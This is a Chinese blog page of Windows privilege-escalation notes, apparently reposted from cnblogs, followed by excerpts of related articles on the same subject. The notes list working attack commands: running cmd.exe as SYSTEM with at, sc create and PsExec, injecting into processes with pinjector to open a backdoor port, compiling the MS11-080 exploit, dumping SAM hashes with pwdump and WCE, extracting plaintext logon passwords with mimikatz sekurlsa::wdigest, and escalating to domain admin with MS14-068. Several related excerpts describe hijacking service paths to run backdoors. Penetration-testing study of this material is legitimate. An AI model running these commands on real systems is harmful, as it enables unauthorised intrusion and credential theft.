提权

最新推荐文章于 2025-01-14 13:31:39 发布
最新推荐文章于 2025-01-14 13:31:39 发布
阅读量125 收藏 1
点赞数 1
CC 4.0 BY-SA版权
原文链接:http://www.cnblogs.com/demonxian3/p/8191217.html

 

 

at  8:00 /interactive cmd.exe    以system用户打开cmd.exe

taskkill explorer

taskadd explorer   以system用户打开桌面

 

sc create syscmd binpath = "cmd /k start" type = own type = interact

sc start syscmd

 

net user administrator /active:yes

 

 

 

tools

https://docs.microsoft.com/zh-cn/sysinternals/

sysinternals工具包    Windows 大神: Mark Russinovich

psExec -i -s cmd.exe

 

pInjector.exe 注入工具

http://www.tarasco.org/security/Process_Injector

pInjector.exe -l

pinjector.exe -p 345 cmd.exe 444      #注入进程345,开启后门服务444 以system用户运行cmd.exe

 

普通用户提权system (利用系统漏洞)

searchsploit ms11-080

searchspoit -m  187176.py

pyinstaller

pywin32

 

py 转 exe

python pyinstaller.py --onefile 18176.py

187176.exe -O xp   

 

PwdDown获取sam哈希值

pwdDump -x 127.0.01pwdDump 127.0.0.1

 

破解sam哈希在线网站

http://www.objectif-securite.ch/ophcrack.php

 

WCE从内存中获取口令工具

另外pwddump.exe 和 wce 在kali的 /usr/share/windows/binary/  /usr/share/wce目录下有

 

wce-universal.exe -h

WCE会读取已经登录的用户密码

 

俄罗斯人写的工具mimikatz_trunk 柠檬

也可以可以获取账号密码

::  两个冒号查看帮助

 

privilege ::   查看privilege帮助

 

privilege::debug   提权到debug权限

 

sekurlsa::

sekurlsa:: wdigest  获取在线用户密码

 

 

ms14-068  普通用户提升至域管理员用户

dcpromo

转载于:https://www.cnblogs.com/demonxian3/p/8191217.html

将进程至DEBUG级别
a237428367的专栏
10-13 1770
//引用API,设置基本参数 internal const int SE_PRIVILEGE_ENABLED = 0x00000002; internal const int TOKEN_QUERY = 0x00000008; internal const int TOKEN_ADJUST_PRIVILEGES = 0x00000020; internal const string SE_DEBUG_NAME = "SeDebugPr
【渗透测试笔记】之【
AA8j的博客
06-03 593
操作系统默认用户 Windows User Administrator System Linux User Root Windows USER->System WinXP、03 at 10:11 /intertractive cmd Win7、8 sc Create syscmd binPath="cmd /K start" type=own type=interact sc start syscmd 利用开发工具 首先下载微软开发工具包:https://download.sysin
.NET 分享一款Windows实战工具
ahhacker86的专栏
11-24 447
Sharp4GetSystem.exe 是一款专为升设计的工具,旨在从管理员帐户升到 SYSTEM 用户限。它通过调用一系列 Windows 原生 API,生成一个以 SYSTEM 限运行的新进程。该进程会绑定到活动终端会话,并且可以在当前桌面上交互显示。这一工具在某些需要 SYSTEM 用户限且需要交互能力的场景中尤为有用,例如执行高限任务或调试 SYSTEM 限的操作。03使用方法Sharp4GetSystem.exe 使用非常简单,只需以管理员身份运行此工具
本地
weixin_45605313的博客
06-01 695
本地windowSysinternalsSuite->PsExec.exe利用系统命令进程注入pinjector.exe(隐蔽)fgdumpmimikatzwin缓存密码linux脏牛suid/etc/passwd文件的配置不当sudo组 window 常见window限: 普通用户:user 管理员:administrator 系统:system admin->system SysinternalsSuite->PsExec.exe 微软发布的一套非常强大的免费工具程序集 Ps
windows升——windows2003进程注入升(本地)
W小哥
12-03 4168
一、进程注入简介 进程注入是本地方式的一种较为老的安全技术了,利用的是注入进程的所有者实现限共享机制,这类技术主要利用在Windows2008之前操作系统上。所以我们需要学习后续的本地更多的手法才能针对高版本的系统。 版本: Windows2008之前 1.1 教程 演示环境:windows2003 1、将pinjector工具上传到目标服务器,运行以下命令 pinjector.exe       //运行命令,查看用法 pinjector.exe -l //列出可注入的进程 pin
Domain 魔法棒、域控小精灵,域控工具
11-17
在信息技术领域,域控工具是网络管理员和安全专家用于管理或测试网络安全限的重要工具之一。本文将详细介绍一种名为“Domain 魔法棒”的域控工具,它的功能、使用方法以及相关注意事项。 首先,“Domain ...
sudo普通用户免密切换到root详细笔记
07-02
本笔记将详细讲解如何通过`sudo`进行以及设置普通用户免密切换到root的方法。 首先,我们创建一个新的用户`shi`: ```bash [root@www ~]# useradd shi ``` 接着,我们为`shi`用户设置密码: ```bash [root@...
升-linux手法总结
01-14
### 升-linux手法总结 #### 1. Linux概述 在Linux系统中,限管理是一项至关重要的安全措施。用户被赋予不同级别的限来访问系统资源和服务。然而,在某些情况下,攻击者可能会试图通过各种手段来...
Linux利用UDF库实现Mysql
09-10
本篇将详细介绍如何利用UDF库来实现MySQL的操作。 首先,通常涉及到获取更高的系统限,而在MySQL中,通过UDF库可以执行系统级别的命令,从而可能达到限的目的。要实现这一过程,我们需要满足以下...
Linux姿势二:利用NFS
09-01
Linux 姿势二:利用 NFS Linux 姿势二:利用 NFS 是指在 Linux 系统中,利用 NFS(Network File System)共享来升级特的一种方法。当我们拥有低特的 shell 并且发现服务器中具有 NFS 共享时,...
windows系统工具.zip
12-25
windows7,windows2003等系统的工具,psexec.exe程序可以实现windows7和2003的,whoami可以在win7上查看当前用户,pinjector是一个进程注入工具,procexp是一个手动查杀病毒的工具可以用来找到被进程注入的进程。
2024年网安最新windows升总结
2401_84301853的博客
05-01 201
调出一个system限的命令框这个使用与windowsservice服务器2003 2008 2016都试用,但是有可能会出现限拒绝的情况这个程序时windows自带的,不会出现被查杀的情况,在实战中可以将cmd程序改为后门程序,那么我们的后门程序就会以system的限去执行,那么我们获取到的限就是system限。
windows升总结
最新发布
2401_89190641的博客
01-14 688
服务的执行就是执行指定目录下的执行程序,但是有的服务的执行程序可以用修改,前期信息收集的时候,我们就可以使用工具来修改服务程序的路径,让服务启动的时候去执行我们的后门程序,我们在攻击机器上进行监听就可以获取到其计算机限(修改服务对应的执行程序,将这个执行程序改为我们的后门程序就可以做到执行这个服务的时候来执行我们的后门程序从而实现上线)在实际的运用过程中,我们使用webshell工具目标主机上就可以调用这个程序,然后使用msf进行监听后门就可以获取限(PS:不同的主机需要使用不同id号码进行
Python Injector 项目下载及安装教程
gitblog_01280的博客
10-18 706
Python Injector 项目下载及安装教程 1. 项目介绍 Injector 是一个受 Google Guice 启发的 Python 依赖注入框架。它旨在通过自动和传递地供依赖项来简化大型应用程序中的代码,从而减少样板代码。Injector 还鼓励通过模块化代码来实现良好的代码隔离。 2. 项目下载位置 你可以通过以下链接下载 Injector 项目: Injector GitHub ...
Windows】进程注入
ssrf
03-04 1688
介绍 获取当前操作系统进程中所拥有的限 注入进程【相当于开了一个后门,隐蔽性极高,不会创建新的进程,很难发现】 注入到system用户的进程,当管理员账户或其他账户注销后,后门仍然存在。可以理解为将pinjector注入到其他用户的进程里一起运行,进而同时拥有了对应的限。 攻击过程 使用工具列出当前操作系统的所有进程 pinjector.exe -l 可以看到不同的进程对应不同PID和用户。 执行pinjector.exe -p 600 cmd 2345注入进程pid为600的进程,使用端口23
【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-10
youngerll的博客
01-03 2373
【小迪安全】web安全|渗透测试|网络安全 | 学习笔记-10
】注入进程
weixin_34008784的博客
12-31 640
注入进程【相当于开了一个后门,隐蔽性极高,不会创建新的进程,很难发现】 注入到system用户的进程,当管理员账户或其他账户注销后,后门仍然存在。可以理解为将pinjector注入到其他用户的进程里一起运行,进而同时拥有了对应的限。 下面是图文教程。 0x01 从http://www.tarasco.org/security/Process_Injector/ 下载pinjecto...
Windows高进程限至Debug
BetaBin
03-26 9742
关于,需要了解知道下面三个函数吧, OpenProcessToken 得到进程的令牌句柄 LookupPrivilegeValue 查询进程的限 AdjustTokenPrivileges 判断令牌限 在Windows下,每个进程不是说有管理员限就可以为所欲为。因为每个进程还有个令牌,访问令牌吧。而令牌代表了一些限使用,如果需要某些特殊限,需要自己去使能或除能。
关于本地的学习笔记(二):注入进程和利用漏洞
Mi1k7ea
02-26 3794
本文为学习笔记,很多不足之处望各位指导一下~ 注入进程: 该方式在实现的同时给系统安放了后门,以便于进行隐蔽的监听。 下载pinjector.exe程序: https://www.tarasco.org/security/Process_Injector/ 然后将该程序放入system32目录中,在命令行中输入pinjector,示有-l和-p两个参数,先输入pinje
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值